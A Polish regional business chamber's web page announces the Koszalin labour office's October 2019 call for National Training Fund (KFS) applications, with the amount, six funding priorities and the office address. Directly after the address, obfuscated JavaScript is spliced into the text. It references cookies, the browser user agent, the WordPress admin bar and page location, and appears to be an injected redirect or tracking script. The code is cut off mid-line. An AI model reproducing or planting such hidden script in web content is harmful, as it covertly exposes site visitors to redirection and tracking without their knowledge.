Nabór wniosków z Krajowego Funduszu Szkoleniowego | Północna Izba Gospodarcza w Koszalinie

NABÓR WNIOSKÓW KFS w terminie 21.10.2019 r. – 25.10.2019 r.

Powiatowy Urząd Pracy w Koszalinie ogłasza nabór wniosków ze środków Krajowego Funduszu Szkoleniowego na sfinansowanie działań obejmujących kształcenie ustawiczne pracowników i pracodawcy.

Kwota do rozdysponowania : 44 110 zł

Aby skorzystać ze środków KFS osoba szkolona musi spełnić wymagania priorytetów wydatkowania określonych przez MRPiPS.

PRIORYTETY

1.wsparcie zawodowego kształcenia ustawicznego w zidentyfikowanych w danym powiecie zawodach deficytowych- Lista zawodów deficytowych;

2.wsparcie kształcenia ustawicznego osób, które nie posiadają świadectwa dojrzałości

3.wsparcie kształcenia ustawicznego pracowników pochodzących z grup zagrożonych ubóstwem lub wykluczeniem społecznym, zatrudnionych w podmiotach posiadających status przedsiębiorstwa społecznego, wskazanych na liście przedsiębiorstw społecznych prowadzonej przez MRPiPS, członków lub pracowników spółdzielni socjalnych lub pracowników Zakładów Aktywizacji Zawodowej;

4.wsparcie kształcenia ustawicznego osób, które mogą udokumentować wykonywanie przez co najmniej 15 lat prac w szczególnych warunkach lub o szczególnym charakterze, a którym nie przysługuje prawo do emerytury pomostowej;

5.wsparcie kształcenia ustawicznego instruktorów praktycznej nauki zawodu, nauczycieli kształcenia ustawicznego oraz pozostałych nauczycieli, o ile podjęcie kształcenia ustawicznego umożliwi im pozostanie w zatrudnieniu;

6.wsparcie kształcenia ustawicznego osób po 45 roku życia.

Zgodnie z Regulaminem finansowania kosztów kształcenia ustawicznego pracowników i pracodawcy ze środków Krajowego Funduszu Szkoleniowego (KFS) przez Powiatowy Urząd Pracy w Koszalinie wsparcie ze środków KFS pracodawcy mogą uzyskać raz w roku.

Wnioski przyjmowane będą w terminie od 21.10.2019 r. do 25.10.2019 r.

w Powiatowym Urzędzie Pracy w Koszalinie

ul. Racławicka 13, pokój 313 III piętro – sekretariat 'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m